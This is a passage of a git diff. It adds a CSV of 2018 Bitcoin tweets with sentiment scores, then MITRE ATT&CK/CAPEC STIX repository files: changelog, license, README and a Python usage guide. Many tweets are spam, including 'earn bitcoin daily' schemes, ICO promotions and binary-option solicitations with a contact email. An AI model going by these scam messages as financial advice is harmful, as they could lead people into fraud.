2018,MANA is now £0.06. 
#crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 08:31:05 +0000 2018,How many retweets for 1 Bitcoin sir? @MBuhari,1.0 +Fri Mar 23 08:31:14 +0000 2018,"Hello humans, #Bitcoin is currently around $8532.48 as of Fri Mar 23 03:31:10 CDT 2018",0.0 +Fri Mar 23 08:31:32 +0000 2018,Bitcoin value: $8496.63,0.0 +Fri Mar 23 08:32:43 +0000 2018,"just all-in BCH. Bitcoin Cash. Bcash . Whatever , im here to profit or rekt.",0.0 +Fri Mar 23 08:33:07 +0000 2018,"Already more than 2.600 members are part of #XATRA community!, thank you. #XTR #ICO #XATRA #Blockchain #Coin # BTC # Bitcoin #ETH #Ethereum",1.0 +Fri Mar 23 08:33:17 +0000 2018,"widrowEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:33:25 +0000 2018,A project with great prospects and opportunities. I place great hopes on him #ICO #blockchain #bitcoin #TokenSale #UTEMIS,1.0 +Fri Mar 23 08:33:27 +0000 2018,"@mchooyah 2 word Printing Press , perfect solution for massive paper devaluation (Venezuela) HODL Bitcoin .",1.0 +Fri Mar 23 08:33:30 +0000 2018,"The #BitcoinPizza would be worth US$85,248,300.00 right now (down -5.21% in the last 24 hours): #Bitcoin",1.0 +Fri Mar 23 08:33:33 +0000 2018,hackers in Atlanta need da Bitcoin or else,0.0 +Fri Mar 23 08:33:42 +0000 2018,So @Densonology you like #Bitcoin & #Crypto Cool 👍🏻 Great to connect Chris much appreciated,1.0 +Fri Mar 23 08:34:26 +0000 2018,"i can't say the phrase ""borrow me bitcoin"" in my head without it turning into a YARRRRRRR-y pirate voice",0.0 +Fri Mar 23 08:35:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:35:49 +0000 2018,Bitcoin-seeking Hackers Infect Atlanta’s Computers Marking First Such Attack on the Capital of the South -,1.0 +Fri Mar 23 08:36:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:00 +0000 2018,Bitcoin historic crash below 395,0.0 +Fri Mar 23 08:37:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:35 +0000 2018,"Bitcoin maximalists: it's all broken, and no, we can't tell you why.",-1.0 +Fri Mar 23 08:37:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:37:53 +0000 2018,"Optimal tx fee: 15 satoshi per byte. +BTC : $8482 / €6884 / £6015 @ Block 514768. +Market Cap: 143.58B USD. #Bitcoin #Finance",0.0 +Fri Mar 23 08:37:58 +0000 2018,@Aj_anwuli @MBuhari I have plans for the Bitcoin 😒,0.0 +Fri Mar 23 08:38:02 +0000 2018,"Join the ICO prospective project! 🤠❣️ +#thrive #ico #ethereum #bitcoin",0.0 +Fri Mar 23 08:38:29 +0000 2018,#ff @drei4u @drei4ucalls Bitcoin Master is his real name and occupation,1.0 +Fri Mar 23 08:39:16 +0000 2018,Bitcoin news sentiment changed to Positive in the last hour #bitcoin #bitsmart,1.0 +Fri Mar 23 08:39:39 +0000 2018,Bitcoin historic money laundering crash probe below 595,0.0 +Fri Mar 23 08:40:03 +0000 2018,"1 bitcoin = $8526.75 / 6912.9€ +1 bitcoin-cash = $990.092 / 802.698€ +1 ethereum = $522.539 / 423.639€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:40:11 +0000 2018,"$BTC 💵 price: $8528.99 1.00000BTC +1h: +1.09% 📈 +1d: -4.97% 🔻 +7d: +3.59% 📈 +👾 #Bitcoin 24h volume: $5,683,100,000",0.0 +Fri Mar 23 08:40:46 +0000 2018,"Mohammed 647Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:41:19 +0000 2018,The market is bear till your 40 years old uncle asks you about how to buy bitcoin.,1.0 +Fri Mar 23 08:41:22 +0000 2018,"฿ value over 3 months: --40.14%, ($-5688.01) [Currently $8481.995] #bitcoin",0.0 +Fri Mar 23 08:41:26 +0000 2018,"@NicKanali Good. + +Virtual currency is a catch all term for both bonga points and bitcoin and ingame tokens like WoW coins",1.0 +Fri Mar 23 08:41:50 +0000 2018,#Twitter and #Square CEO has seen the fortunes of the latter company change dramatically on #bitcoin enthusiasm.,0.0 +Fri Mar 23 08:41:52 +0000 2018,@Elyz38581503 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:42:16 +0000 2018,@CristKaytlynn if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:42:52 +0000 2018,@RohanKothekar09 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:43:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:43:14 +0000 2018,#bitcoin 28k in play,0.0 +Fri Mar 23 08:43:20 +0000 2018,@Jilliemary if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:43:48 +0000 2018,Bitcoin mining farm,0.0 +Fri Mar 23 08:44:12 +0000 2018,@MukhtarBilal2 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:44:14 +0000 2018,"#Bitcoin #Trading Protip: Right click the price bar on the right. Left click ""countdown."" Now you can see how long until the candle closes.",1.0 +Fri Mar 23 08:44:22 +0000 2018,@2B7C89526 Insult. 
Why would anyone who actually has any understanding of it have good things to say about Bitcoin?,1.0 +Fri Mar 23 08:44:43 +0000 2018,@DH1278 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:45:16 +0000 2018,@youngjaydanny if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:45:43 +0000 2018,Ion know who’s behind this but I want in ! Ion even know how to work Bitcoin 😭,-1.0 +Fri Mar 23 08:45:53 +0000 2018,If only #Bitcoin was as stable as the South African Rand 😂🤣😂🤣,0.0 +Fri Mar 23 08:46:21 +0000 2018,@WhalePanda Ver always chooses Friday afternoon to attack the bitcoin network,0.0 +Fri Mar 23 08:46:43 +0000 2018,@GarciaDerek4 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:47:21 +0000 2018,@oney2030 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com,1.0 +Fri Mar 23 08:48:04 +0000 2018,@RichardHeartWin Twitter Protip: Don’t buy ICO’s. Buy Bitcoin.,0.0 +Fri Mar 23 08:48:06 +0000 2018,BITCOIN IS AT 8521.015,0.0 +Fri Mar 23 08:48:09 +0000 2018,"#Thrive public sale is still live. +2 days left, 85% cap reached. +#ico #ethereum #bitcoin",1.0 +Fri Mar 23 08:48:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:49:13 +0000 2018,@Cryptodirewolf The evolution of #bitcoin relies on the ability to “trust”,0.0 +Fri Mar 23 08:49:29 +0000 2018,"@WhalePanda This is the end boy. Pack it up, Bitcoin is dead.",-1.0 +Fri Mar 23 08:50:03 +0000 2018,"1 bitcoin = $8525.41 / 6911.814€ +1 bitcoin-cash = $988.618 / 801.503€ +1 ethereum = $523.947 / 424.78€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:50:23 +0000 2018,@CryptoTutor What does this mean for Bitcoin and altcoins? 
Is there an altseason coming this year?,-1.0 +Fri Mar 23 08:50:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:51:07 +0000 2018,@WhalePanda Satoshis Vision conference coming up. Brace for some good old bcash pumping / bitcoin mind games.,1.0 +Fri Mar 23 08:51:33 +0000 2018,Bitcoin value: $8509.35,0.0 +Fri Mar 23 08:51:56 +0000 2018,One Satori Coin is currently worth $8.47 USD #bitcoin #satori,1.0 +Fri Mar 23 08:52:08 +0000 2018,@sole24ore Imminente crack. Comprate bitcoin,0.0 +Fri Mar 23 08:52:20 +0000 2018,"Fri Mar 23 09:52:03 2018 (86:52) +USD : 8499.06 +Wght: 0.42 +Blk#: 514769 +Size: 974.9 KB +TXs: 1983 +Pool: 11299 (7.9 MB) +#bitcoin",0.0 +Fri Mar 23 08:52:45 +0000 2018,@rogerkver @Falkvinge Yes buy bitcoin sell Bitcoin cash,0.0 +Fri Mar 23 08:52:45 +0000 2018,@tonywestonuk Thanks. Can’t say I agree about Bitcoin. It just another form of money.,1.0 +Fri Mar 23 08:53:11 +0000 2018,New #bitcoin block 000000000000000000041cd647cc6d0b096cbacee10808127ead162784a3bcae mined at height 514769.,1.0 +Fri Mar 23 08:53:25 +0000 2018,"Hey join this awesome project, they're doing something mega outstanding! #ICO #Essentia https: //twitter.com/Essentia_one #Crypto #bitcoin",1.0 +Fri Mar 23 08:53:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:54:44 +0000 2018,@ChandlerGuo How can I get my bitcoin God?,0.0 +Fri Mar 23 08:54:53 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:55:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:55:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 
diff --git a/cti-ATT-CK-v13.1/.gitignore b/cti-ATT-CK-v13.1/.gitignore
new file mode 100644
index 0000000000000000000000000000000000000000..491420c629e9b85f0157d5a246d930719e929472
--- /dev/null
+++ b/cti-ATT-CK-v13.1/.gitignore
@@ -0,0 +1,6 @@
+hashes.json
+*.pyc
+.DS_Store
+.idea
+.vscode
+venv
diff --git a/cti-ATT-CK-v13.1/CHANGELOG.md b/cti-ATT-CK-v13.1/CHANGELOG.md
new file mode 100644
index 0000000000000000000000000000000000000000..6e38a0b13a9012070951c2e042f438a948213033
--- /dev/null
+++ b/cti-ATT-CK-v13.1/CHANGELOG.md
@@ -0,0 +1,102 @@
+
+# Changes to the ATT&CK/STIX Data Model
+
+## 25 April 2023 - ATT&CK Spec v3.1.0
+
+Changes to ATT&CK in STIX for April 2023 ATT&CK Content Release (ATT&CK v13.0)
+
+* Restored the `labels` property for ICS mitigation objects. This property documents security controls for ICS mitigations.
+
+## 25 October 2022 - ATT&CK Spec v3.0.0
+
+Changes to ATT&CK in STIX for October 2022 ATT&CK Content Release (ATT&CK-v12.0)
+
+* Added Campaign objects. For detailed information about the representation of Campaigns in ATT&CK/STIX, please see the campaign section of the [USAGE document](https://github.com/mitre/cti/blob/master/USAGE.md).
+
+## 25 April 2022 (ATT&CK v11) release
+
+NOTE: Changes to ATT&CK for the April 2022 (ATT&CK v11) release were initially omitted from this change log.
+
+As of the v11 content release, the following fields that previously were only available in the STIX 2.1 bundles are also available in STIX 2.0.
+
+* `x_mitre_modified_by_ref`: has been added to all object types. Defined in spec 2.0.0 below.
+* `x_mitre_domains`: has been added to all non-relationship objects. Defined in spec 2.0.0 below.
+* `x_mitre_attack_spec_version`: has been added to all object types. Defined in spec 2.1.0 below.
+
+## 21 October 2021 - ATT&CK Spec v2.1.0
+Changes to ATT&CK in STIX for October 2021 ATT&CK Content Release (ATT&CK-v10.0)
+
+| Feature | [Available in STIX 2.0](https://github.com/mitre/cti) | [Available in STIX 2.1](https://github.com/mitre-attack/attack-stix-data) |
+|:--------|:-----------------------------------------------------:|:-------------------------------------------------------------------------:|
+| Added full objects for data sources and data components. See [the data sources section of the USAGE document](https://github.com/mitre-attack/attack-stix-data/blob/master/USAGE.md#data-sources-and-data-components) for more information about data sources, data components, and their relationships with techniques. | :white_check_mark: | :white_check_mark: |
+| Added `x_mitre_attack_spec_version` field to all object types. This field tracks the version of the ATT&CK Spec used by the object. Consuming software can use this field to determine if the data format is supported; if the field is absent the object will be assumed to use ATT&CK Spec version `2.0.0`. | :x: | :white_check_mark: |
+
+## 21 June 2021 - ATT&CK Spec v2.0.0
+Release of ATT&CK in STIX 2.1.
+
+The contents of this repository is not affected, but you can find ATT&CK in STIX 2.1 (ATT&CK spec v2.0.0+) on our new [attack-stix-data](https://github.com/mitre-attack/attack-stix-data) GitHub repository. Both MITRE/CTI (this repository) and attack-stix-data will be maintained and updated with new ATT&CK releases for the foreseeable future, but the data model of attack-stix-data includes quality-of-life improvements not found on MITRE/CTI.
+
+| Feature | [Available in STIX 2.0](https://github.com/mitre/cti) | [Available in STIX 2.1](https://github.com/mitre-attack/attack-stix-data) |
+|:--------|:-----------------------------------------------------:|:-------------------------------------------------------------------------:|
+| Added `x_mitre_modified_by_ref` field to all object types. This field tracks the identity of the individual or organization which created the current _version_ of the object. | :x: | :white_check_mark: |
+| Added `x_mitre_domains` field to all non-relationship objects. This field tracks the domains the object is found in. | :x: | :white_check_mark: |
+| Added [collection](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/blob/master/docs/collections.md) objects to track information about specific releases of the dataset and to allow the dataset to be imported into [ATT&CK Workbench](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/). | :x: | :white_check_mark: |
+| Added a [collection index](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/blob/master/docs/collections.md) to list the contents of this repository and to allow the data to be imported into [ATT&CK Workbench](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/). | :x: | :white_check_mark: |
+
+## 29 April 2021
+Changes to ATT&CK in STIX for April 2021 ATT&CK Content Release (ATT&CK-v9.0)
+
+1. Replaced `GCP`, `AWS` and `Azure` platforms under the enterprise domain with `IaaS` (Infrastructure as a Service).
+2. Added `Containers` and `Google Workspace` to the platforms of the enterprise domain.
+3. Revised the data sources of the enterprise domain. Data sources are still represented as a string array, but the elements within that array are now formatted `"data source: data component"` to reflect the new data source representation. More information on the new data sources can be found on our [attack-datasources](https://github.com/mitre-attack/attack-datasources) GitHub repository. Note that the data sources in the ICS domain was not affected by this change.
+
+With the release of ATT&CK version 9 we are also hosting an excel representation of the knowledge base on our website. You can find that representation and more about ATT&CK tools on the updated [Working with ATT&CK](https://attack.mitre.org/resources/working-with-attack/) page.
+
+## 27 October 2020
+Changes to ATT&CK in STIX for October 2020 ATT&CK Content Release (ATT&CK-v8.0)
+
+1. Added new platforms under the enterprise domain: `Network` and `PRE`.
+2. Deprecated the pre-ATT&CK domain. Pre-ATT&CK has been migrated to two new tactics in the Enterprise domain tagged with the `PRE` platform. Please see the new [PRE matrix](https://attack.mitre.org/matrices/enterprise/PRE/) for the replacing Enterprise tactics and techniques. All objects within the pre-ATT&CK domain have been marked as deprecated, along with a new description pointing to their new home in Enterprise.
+3. Added the [ATT&CK for ICS domain](ics-attack).
+
+## 8 July 2020 - ATT&CK Spec v1.3.0
+Changes to ATT&CK in STIX for July 2020 ATT&CK Content Release (ATT&CK-v7.0)
+
+1. Added sub-techniques:
+ - A sub-technique is an attack-pattern where `x_mitre_is_subtechnique` is `true`.
+ - Relationships of type `subtechnique-of` between sub-techniques and techniques convey their hierarchy.
+
+ For more information about the representation of sub-techniques in STIX, please see [the sub-techniques section of the USAGE document](USAGE.md#sub-techniques).
+2. Revised the representation of deprecated objects. The first paragraph of deprecated objects' descriptions should in most cases convey the reason the object was deprecated.
+
+We've also rewritten the [USAGE](USAGE.md) document with additional information about the ATT&CK data model and more examples of how to access and use ATT&CK in Python.
+
+## 24 October 2019
+Changes to ATT&CK in STIX for October 2019 ATT&CK Content Release (ATT&CK-v6.0)
+1. Added cloud platforms under the enterprise domain: `AWS`, `GCP`, `Azure`, `Office 365`, `Azure AD`, and `SaaS`.
+
+## 31 July 2019
+Changes to ATT&CK in STIX for July 2019 ATT&CK Content Release (ATT&CK-v5.0)
+1. Descriptions added to relationships of type `mitigates` under the enterprise domain
+
+## 30 April 2019 - ATT&CK Spec v1.2.0
+Changes to ATT&CK in STIX for April 2019 ATT&CK Content Release (ATT&CK-v4.0)
+1. `x_mitre_impact_type` added for enterprise techniques within the `Impact` tactic
+2. Descriptions added to relationships between software/groups
+
+## 23 October 2018 - ATT&CK Spec v1.1.0
+Changes to ATT&CK in STIX for October 2018 ATT&CK Content Release (ATT&CK-v3.0)
+
+1. `x_mitre_platforms` added for enterprise malware/tools
+2. `x_mitre_detection` added to attack-patterns
+3. Custom MITRE attributes removed from descriptions in attack-patterns
+4. Alias descriptions added for malware/tools/intrusion-sets as external references
+5. Descriptions added to relationships between groups/attack-patterns in PRE-ATT&CK
+6. Names of ATT&CK objects replaced in descriptions and x_mitre_detection fields with markdown links
+7. `CAPEC ids` added to external references for attack-patterns
+8. Citations in alias descriptions added as external references in the object containing the alias description
+9. Added `x-mitre-tactic` and `x-mitre-matrix` objects
+10. Changed ===Windows=== subheadings to ### Windows subheadings (Windows is just one example)
+11. Added space between asterisks (ex. *Content to * Content) to populate markdown correctly
+12. Changed "true" to True in `x_mitre_deprecated`
+13. Added old ATT&CK IDs to Mobile/PRE-ATT&CK objects whose IDs have changed as `x-mitre-old-attack-id`
diff --git a/cti-ATT-CK-v13.1/LICENSE.txt b/cti-ATT-CK-v13.1/LICENSE.txt
new file mode 100644
index 0000000000000000000000000000000000000000..b994d688c86c1539bf2998b11890ff3c9ad2e058
--- /dev/null
+++ b/cti-ATT-CK-v13.1/LICENSE.txt
@@ -0,0 +1,38 @@
+ATT&CK®
+===========================
+License
+-------
+The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK® for research,
+development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce
+MITRE's copyright designation and this license in any such copy.
+
+"© 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation."
+
+Disclaimers
+-----------
+MITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part
+of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or
+cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques
+or variations on existing techniques not documented by ATT&CK.
+
+ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE
+ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS,
+AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE
+USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS
+FOR A PARTICULAR PURPOSE.
+
+CAPEC™
+===========================
+License
+-------
+The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use Common Attack Pattern
+Enumeration and Classification (CAPEC™) for research, development, and commercial purposes. Any copy you make for
+such purposes is authorized provided that you reproduce MITRE’s copyright designation and this license in any such copy.
+
+Disclaimers
+-----------
+ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE
+ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS,
+AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE
+USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS
+FOR A PARTICULAR PURPOSE.
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/README.md b/cti-ATT-CK-v13.1/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..69eaf199dd37a6647ffba85e6b1fe5fc5b928057
--- /dev/null
+++ b/cti-ATT-CK-v13.1/README.md
@@ -0,0 +1,32 @@
+# CTI
+
+This repository contains the MITRE ATT&CK® and CAPEC™ datasets expressed in STIX 2.0. See [USAGE](USAGE.md) or [USAGE-CAPEC](USAGE-CAPEC.md) for information on using this content with [python-stix2](https://github.com/oasis-open/cti-python-stix2).
+
+If you are looking for ATT&CK represented in STIX 2.1, please see the [attack-stix-data](https://github.com/mitre-attack/attack-stix-data) GitHub repository. Both MITRE/CTI (this repository) and attack-stix-data will be maintained and updated with new ATT&CK releases for the foreseeable future, but the data model of attack-stix-data includes quality-of-life improvements not found on MITRE/CTI. Please see the [attack-stix-data USAGE document](https://github.com/mitre-attack/attack-stix-data) for more information on the improved data model of that repository.
+
+## ATT&CK
+
+MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.
+
+
+
+## CAPEC
+
+Understanding how the adversary operates is essential to effective cyber security. CAPEC™ helps by providing a comprehensive dictionary of known patterns of attacks employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. It can be used by analysts, developers, testers, and educators to advance community understanding and enhance defenses.
+
+- Focuses on application security
+- Enumerates exploits against vulnerable systems
+- Includes social engineering / supply chain
+- Associated with Common Weakness Enumeration (CWE)
+
+
+
+## STIX
+
+Structured Threat Information Expression (STIX™) is a language and serialization format used to exchange cyber threat intelligence (CTI).
+
+STIX enables organizations to share CTI with one another in a consistent and machine readable manner, allowing security communities to better understand what computer-based attacks they are most likely to see and to anticipate and/or respond to those attacks faster and more effectively.
+
+STIX is designed to improve many different capabilities, such as collaborative threat analysis, automated threat exchange, automated detection and response, and more.
+
+
diff --git a/cti-ATT-CK-v13.1/USAGE-CAPEC.md b/cti-ATT-CK-v13.1/USAGE-CAPEC.md
new file mode 100644
index 0000000000000000000000000000000000000000..c12be3754a0166faf6c807ddf209a61ef0e172b9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/USAGE-CAPEC.md
@@ -0,0 +1,136 @@
+# Introduction
+This document describes how to query and manipulate CAPEC data in this repository. Machine-readable CAPEC data is available in
+a JSON-based [STIX 2.0 and STIX 2.1 formats](https://oasis-open.github.io/cti-documentation/stix/intro). See [Release Notes](#release-notes) for any changes to the generation of the STIX CAPEC data.
+
+STIX 2.x is just JSON and so should be very accessible from Python and other programming languages. If you are using Python, the [python-stix2](https://github.com/oasis-open/cti-python-stix2) library can help you work with the content as shown in the examples below.
+
+# Mapping Concepts
+First, we must describe how CAPEC objects and properties map to STIX 2.x objects and properties.
+
+## Objects
+In CAPEC, the main object is the Attack Pattern. Most Attack Pattern also have Mitigations. There are other types of objects in CAPEC (e.g, Category, View, etc.), but these are not (currently) part of the repository.
+
+The STIX types are found as literal strings assigned to the `type` property of the STIX JSON object. The STIX 2.x object called "Attack Pattern" corresponds to a CAPEC attack pattern. In STIX 2.x, there are objects called "Course(s) of Action" which can be used to describe CAPEC Mitigations.
+
+## Properties
+The following is a table mapping of CAPEC properties to STIX properties. Some of these properties are standard STIX properties, while others were custom-created for compatibility with CAPEC. These properties are accessed from STIX objects as JSON properties.
+
+### Attack Pattern Properties
+| CAPEC 3.6 Property | STIX Properties | STIX type |
+| --------------- | --------------- | --------------- |
+**Name** | `name` | string |
+**Description** | `description` | string
+**Extended_Definition** | `x_capec_extended_definition` | string
+**Abstraction** | `x_capec_abstraction` | enumeration(`Meta, Standard, Detailed`)
+**Alternate\_Terms** | `x_capec_alternate_terms` | list(string)
+**Consequences** | `x_capec_consequences` | dictionary(enumeration(`High, Medium, Low`), string)
+**Example\_Instances** | `x_capec_example_instances` | list(string)
+**Execution\_Flows** | `x_capec_execution_flows` | (XHTML) string
+**Likelihood\_Of\_Attack** | `x_capec_likelihood_of_attack` | enumeration(`High, Medium, Low`)
+**Notes** | **Other\_Notes** | `x_capec_notes` | list(string)
+**Prerequisites** | `x_capec_prerequisites` | list(string)
+**Skills\_Required** | `x_capec_skills_required` | dictionary(string, enumeration(`High, Medium, Low`))
+**Typical\_Severity** | `x_capec_typical_severity` | enumeration(`High, Medium, Low`)
+**ID** | `external_references[i].external_id where external_references[i].source_name == "capec"` | integer
+**Related\_Weaknesses** | `external_references[i].external_id where external_references[i].source_name == "cwe"` | integer
+**References** | `external_references[i].external_id where external_references[i].source_name == "reference_from_CAPEC"` | `external-reference`
+**Mitigation** | `relationship_type == "mitigates"` | `relationship`
+
+### Attack Pattern Relationships
+| CAPEC 3.6 Relationship | STIX Properties | STIX type |
+| --------------- | --------------- | --------------- |
+**parent_of** | `x_capec_parent_of_refs` | list(identifier)
+**child_of** | `x_capec_child_of_refs` | list(identifier)
+**can_precede** | `x_capec_can_precede_refs` | list(identifier)
+**can_follow** | `x_capec_can_follow_refs` | list(identifier)
+**peer_of** | `x_capec_peer_of_refs` | list(identifier)
+
+CAPEC 3.6 properties not mapped (at this time): **Indicators**, **Taxonomy\_Mappings**, **Content\_History**
+
+CAPEC 3.6 properties not appropriate to map: **Status**
+
+# Using Python and STIX 2.x
+In this section, we will describe how to query and manipulate CAPEC data that has been stored in a STIX 2.x repository. A Python library has been created for using and creating STIX 2.x data by the OASIS Technical Committee for Cyber Threat Intelligence, which develops the STIX standard. This library abstracts storage and transport details so that the same code can be used to interact with data locally on the filesystem or in memory, or remotely via [TAXII](https://oasis-open.github.io/cti-documentation/taxii/intro). The source code, installation instructions, and basic documentation for the library can be found [here](https://github.com/oasis-open/cti-python-stix2). There is a more thorough [API documentation](http://stix2.readthedocs.io/en/latest/overview.html) as well.
+
+## Python Library
+To begin querying STIX 2.x data, you must first have a [DataSource](http://stix2.readthedocs.io/en/latest/guide/datastore.html). For these examples, we will simply use a [FileSystemSource](http://stix2.readthedocs.io/en/latest/guide/filesystem.html). The CAPEC corpus must first be cloned or downloaded from [GitHub](https://github.com/mitre/cti).
+
+### Get all Attack Patterns
+Once the stix2 Python library is installed and the corpus is acquired, we need to open the DataStore for querying:
+
+```python
+from stix2 import FileSystemSource
+fs = FileSystemSource('./cti/capec')
+```
+
+When creating the DataSource, the keyword agrument `allow_custom` must be set to `True`. This is because the CAPEC data uses several custom properties which are not part of the STIX 2.x specification (`x_capec_prerequisites`, `x_capec_example_instances`, etc).
+
+To perform a query, we must define a [Filter](http://stix2.readthedocs.io/en/latest/guide/datastore.html#Filters). As of this writing, a filter must, at a minimum, specify object `id`'s or an object `type`. The following filter can be used to retrieve all CAPEC attack patterns:
+
+```python
+from stix2 import Filter
+filt = Filter('type', '=', 'attack-pattern')
+```
+
+Once this filter is defined, you can pass it to the DataSource `query` function in order to actually query the data:
+
+```python
+attack_patterns = fs.query([filt])
+```
+
+Notice that the `query` function takes a **list** of filters. These filters are logically AND'd together during the query. As of this writing, `allow_custom` must be set to `True` in order to query CAPEC data. This is because the CAPEC data uses several custom properties which are not part of the STIX 2.0 specification (`x_capec_prerequisites`, `x_capec_example_instances`, etc).
+
+**For the remaining examples, these imports and the FileSystemStore initialization will be omitted.**
+
+
+### Get any object by CAPEC ID
+In this example, the STIX 2.x type must be passed into the function. Here we query for the attack pattern with ID `66` (*SQL Injection*).
+
+```python
+def get_attack_pattern_by_capec_id(src, capec_id):
+ filt = [
+ Filter('type', '=', 'attack-pattern'),
+ Filter('external_references.external_id', '=', 'CAPEC-' + capec_id),
+ Filter('external_references.source_name', '=', 'capec'),
+ ]
+ return src.query(filt)
+
+get_attack_pattern_by_capec_id(fs, '66')
+```
+
+### Get all Mitigations for specific Attack Pattern
+The mitigations for a technique are stored in objects separate from the technique. These objects are found through a `mitigates` relationship.
+
+```python
+def get_mitigations_by_attack_pattern(src, ap_stix_id):
+ relations = src.relationships(ap_stix_id, 'mitigates', target_only=True)
+ return src.query([
+ Filter('type', '=', 'course-of-action'),
+ Filter('id', 'in', [r.source_ref for r in relations])])
+
+ap = get_attack_pattern_by_capec_id(fs, '66')[0]
+get_mitigations_by_attack_pattern(fs, ap.id)
+```
+
+### Release Notes
+
+The STIX CAPEC data is generated by a python script named `capec2stix`. In this section the changes to the script for each new CAPEC release is listed.
+
+## Release for CAPEC 3.6
+
+* Added the `x_capec_extended_definition` property
+
+## Release for CAPEC 3.5
+
+* Added functionality to infer CAPEC ParentOf and CanFollow relationships:
+ - CAPEC does not explicitly state these relationships, so they needed to be inferred by looking at the children's "ChildOf" relationship and the can follows' "CanPrecede" relationship and work backwards
+ - A global map of CAPEC ids to STIX ids was created by iterating through all CAPEC objects and creating STIX ids
+ - Global maps of CAPEC ids to list of children CAPEC ids and list of CAPEC ids that can follow was created by iterating through all CAPEC objects
+ - When creating STIX Attack Pattern objects, the child and can follow maps are used to find the relationships that are not explicitly stated in the CAPEC object and the STIX id map is used to get the STIX ID for the related CAPECs
+* Added the following properties to the Attack Pattern STIX object:
+ - `x_capec_child_of_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object is a child of
+ - `x_capec_parent_of_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object is a parent of
+ - `x_capec_can_precede_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object can precede
